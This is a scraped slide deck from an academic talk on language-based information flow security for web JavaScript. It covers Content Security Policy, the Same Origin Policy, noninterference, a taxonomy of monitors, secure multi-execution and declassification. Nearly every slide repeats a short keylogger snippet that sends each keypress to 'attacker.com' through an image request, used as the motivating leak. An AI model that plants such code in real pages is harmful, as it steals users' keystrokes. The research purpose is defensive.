Upload
truonglien
View
228
Download
0
Embed Size (px)
Citation preview
Language-based Information Flow Security Enforcements
Tamara Rezk INRIA !!
Joint work with Nataliia Bielova, Raimil Cruz,
Willem De Groef, Dominique Devriese, José Fragoso-Santos, Deepak Garg, Thomas Jensen,
Frank Piessens, Alan Schmitt, Bernard Serpette, Francis Somé, Vineet Rajani, Éric Tanter
!GT Verif
!30/05/17
!
!1
Information Flow Problem
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; } !
secret input
public output
!2
Information Flow Problem
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; } !
How can attacker code execute in my browser?
• If user goes to attacker’s server • Fishing • …
!3
Information Flow Problem
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; } !
How can attacker code execute in my browser?
• If user goes to attacker’s server • Fishing • XSS • If user goes anywhere with third-party code
!10
Information Flow Problem
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; } !
How can we protect from information leaks?
!11
Information Flow Problem
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; } !
How can we protect from this kind of leaks?
!12
• Content Security Policy • Same Origin Policy • Capability systems • Information Flow Enforcement
Information Flow Problem
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; } !
How can we protect from this kind of leaks?
!13
• Content Security Policy • Same Origin Policy • Capability systems • Information Flow Enforcement[CSF’16: On access control, capabilities, their equivalence, and
confused deputy attacks]
Information Flow Problem
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; } !
How can we protect from this kind of leaks?
!14
• Content Security Policy • Same Origin Policy • Capability systems • Information Flow Enforcement
Content Security Policy (CSP)
!15
• Declare trusted contents to the browser • Browser blocks unknown contents !Guarantee: unknown code will not steal user data
http://trusted.com
!script-src ‘self’ third.com
CSP policy
<script> var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; } <script> !!!
Content Security Policy (CSP)
!16
• Declare trusted contents to the browser • Browser blocks unknown contents !Guarantee: unknown code will not steal user data
http://trusted.com
!script-src ‘self’ third.com
CSP policy
! var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
!
<iframe src = othertrustedpage.html></iframe>
?
Content Security Policy (CSP)
!17
http://trusted.com
!script-src ‘self’ third.com
CSP policy
<iframe src = othertrustedpage.html></iframe>
Inconsistencies with the Same Origin Policy [WWW’17 On the Content Security Policy Violations
due to the Same-Origin Policy ] !
analyzed 10K sites: 94% with CSP vulnerable including sites as amazon, imdb, twitter, etc
! var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
!
Same Origin Policy
!18
http://trusted.com
<iframe src = http://attacker.com></iframe>
- it allows programmer to isolate content inside a frame !- for the example below: leaks will still flow to attacker server but only for keys pressed inside the frame
! var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
!
More fine grain enforcement: Information Flow Security
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; } !
secret input
public output
!19
Information Flow Security
!22
=
Security Property: Noninterference?
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
Information Flow Security
!23
Security Property: Noninterference?
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
Information Flow Security
!24
=
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
User presses key 100
User presses key 101
http://attacker.com/?=100
http://attacker.com/?=101
This program does not comply with Noninterference
Information Flow Security
!25
How to enforce it?
Security Property: NoninterferenceNot a trace property, also in a computational flavor [POPL’08 Cryptographically Sound Implementations
for Typed Information-Flow Security]
Information Flow Security
!26
How to enforce it?
- Static Analysis [JCS’96 Volpano&Smith] [CSFW’04 Secure Information Flow by Self Composition] Not appropriate for the web context
!- Dynamic or Hybrid Enforcements [SEC’14 An inlined monitor for JavaScript] [TGC’14 Modular Extensions of Web Monitors] [TGC’15 Hybrid Typing for JavaScript]
Security Property: NoninterferenceNot a trace property, also in a computational flavor [POPL’08 Cryptographically Sound Implementations
for Typed Information-Flow Security]
Information Flow Security
!27
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
How to enforce it?
- Static Analysis [JCS’96 Volpano&Smith] [CSFW’04 Secure Information Flow by Self Composition] Not appropriate for the web context
!- Dynamic or Hybrid Enforcements [SEC’14 An inlined monitor for JavaScript] [TGC’14 Modular Extension of Web Monitors] [TGC’15 Hybrid Typing for JavaScript]
Information Flow Security
!28
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
How to enforce it?
- Static Analysis [JCS’96 Volpano&Smith] [CSFW’04 Secure Information Flow by Self Composition] Not appropriate for the web context
!- Dynamic or Hybrid Enforcements [SEC’14 An inlined monitor for JavaScript] [TGC’14 Modular Extension of Web Monitors] [TGC’15 Hybrid Typing for JavaScript]
Information Flow Security
!29
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
How to enforce it?
- Static Analysis [JCS’96 Volpano&Smith] [CSFW’04 Secure Information Flow by Self Composition] Not appropriate for the web context
!- Dynamic or Hybrid Enforcements [SEC’14 An inlined monitor for JavaScript] [TGC’14 Modular Extension of Web Monitors] [TGC’15 Hybrid Typing for JavaScript]
Soundness Transparency
TSNITANITINI
Monitors
True False
A taxonomy of information flow monitors
!30
[POST’16]
A taxonomy of information flow monitors [POST’16]
! • NSU (no sensitive upgrade) [Zdancewic ’02] !!
• PU (permissive upgrade) [Austin and Flanagan ’10] !!• HM (hybrid monitor) [LeGuernic et al ’06] !!• MF (multiple facets) [Austin and Flanagan ’12]
!• SME (secure multi execution) [Devriese and Piessens ’10]
We study 5 classes of monitors:
!31
SME
MF
HM
PU
NSU
NSU PU HM MF SME
True Transparency
Taxonomy: Transparency
SME
MF
HM
PU
NSU
NSU PU HM MF SME
False Transparency
Previous to [POST’16] work: HM and NSU/PU incomparable [Hedin Bello Sabelfeld et al. 15]
!34
Spot the difference: MF and SME [ESORICS’16]
! !• MF (multiple facets) [Austin and Flanagan ’12]
!• SME (secure multi execution) [Devriese and Piessens ’10]
!35
[POST’16]
[CSF’15]
“Faceted evaluation is a technique for simulating secure multi-execution with a single process”
“Austin and Flanagan [6] show how secure multi-execution can be optimized by executing a single program on faceted values”
Secure Multi Execution (SME):
!36
LOW PROCESS!
HIGH PROCESS!
Basedonpresenta,onofT.Aus,n@POPL’12
secret input
public inputs
secret outputs
public outputs
default input
[Devriese and Piessens Oakland’10]
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; } !
secret input
public output
!37
Secure Multi Execution (SME): !
Execution Low Process
default input: example key 100
[Devriese and Piessens Oakland’10]
Information Flow Security
!38
=
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
User presses key 102
User presses key 101
http://attacker.com/?=100
http://attacker.com/?=101
This program does not comply with Noninterference
Secure Multi Execution
!39
=
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }
presses key 102
User presses key 101
http://attacker.com/?=100
http://attacker.com/?=100
This program does comply with Noninterference
default input: key 100default input: key 100default input: key 100
default input: key 100
Secure Multi Execution (SME)
!40
var d=0, url = ‘http://analytics.com/?='; onkeypress = function(e) { if (e.charCode = 101) d=1; } onunload = function() { $.ajax(url+d); }
Is Noninterference or SME enough in practice?
Secure Multi Execution (SME)
!41
var d=0, url = ‘http://analytics.com/?='; onkeypress = function(e) { if (e.charCode = 101) d=1; } onunload = function() { $.ajax(url+d); }
Is Noninterference or SME enough in practice?
Google analytics library used in 86% of top 10K sites https://webstats.inria.fr/
Declassification [Li&Zdancewic POPL’05 - Relaxed Noninterference]
!42
top secret
public
secret
={!":#$%&'(. ")'*+,&'+*"}
={!":#$%&'(. !):#$%&'(. "==)}
={!":#$%&'(. "}
secret
public
Each point in the lattice is a downgrading policy
Information Flow Security
!44
P
P
=
Security Property: Declassification
secret = function f
v1=f v2 iff f(v1) = f(v2)
=f
Secure Multi Execution with Declassification
!45
inputs
secret outputs
public outputs
[CSF’14 Stateful Declassification Policies for Event-Driven Programs]
Declassifier D generalizes information flow labels as in [Li&Zdancewic POPL’05]
High Process
Low ProcessD+release channel
Secure Multi Execution (SME)
!46
var d=0, url = ‘http://analytics.com/?='; onkeypress = function(e) { if (e.charCode = 101) d=1; } onunload = function() { $.ajax(url+d); }
with Declassification
Secure Multi Execution (SME)
!47
var d=0, url = ‘http://analytics.com/?='; onkeypress = function(e) { if (e.charCode = 101) d=1; } onunload = function() { r = declassify(d); $.ajax(url+r); }
with Declassification
D (s,i) = if i= KeyPress 101 and not s
then (True, Release 1, KeyPress 100) ! else (s, Unchanged, KeyPress 100)
Password Checker does not comply with Noninterference
!48
var password; var input; var output; !output = (password == input)
secret
public
secret
public
var password; var input; var output; !output = (password == input)
Declassification [Li&Zdancewic POPL’05]
!49
secret
public
publicmedium
={!":#$%&'(. ")'*+,&'+*"}
={!":#$%&'(. !):#$%&'(. "==)}
={!":#$%&'(. "}
medium ={!":#$%&'(. !):#$%&'(. "==)}
!50
={!":#$%&'(. !):#$%&'(. "==)}
H
L
P⋮
⋮
={!":#$%&'(. "}
={!":#$%&'(. "*'+,-&',+"}String
={}
={==(y:String):String}
={…fullStringinterface…}
Welostthecomputa.onspecifica.on.Wejusttalkabout
theinterface.Problems?
String≡String↑String
Declassification An Object Oriented perspective
[ECOOP’17, Type Abstraction for Noninterference]
We use object interfaces as security
levels
Summary
!51
Language-based Information Flow Security !
!- provides a fine grain mechanism to specify and enforce propagation of information - strict property: noninterference (TINI, TSNI, computational…) - relaxed properties: declassification (another zoo, RNI) !Enforcements: !!Dynamic Mechanisms - State of the Art: Secure Multi Execution and Multiple Facets !!Purely Static - Not convenient for web applications - Promising direction in using parametricity properties for soundly type declassification policies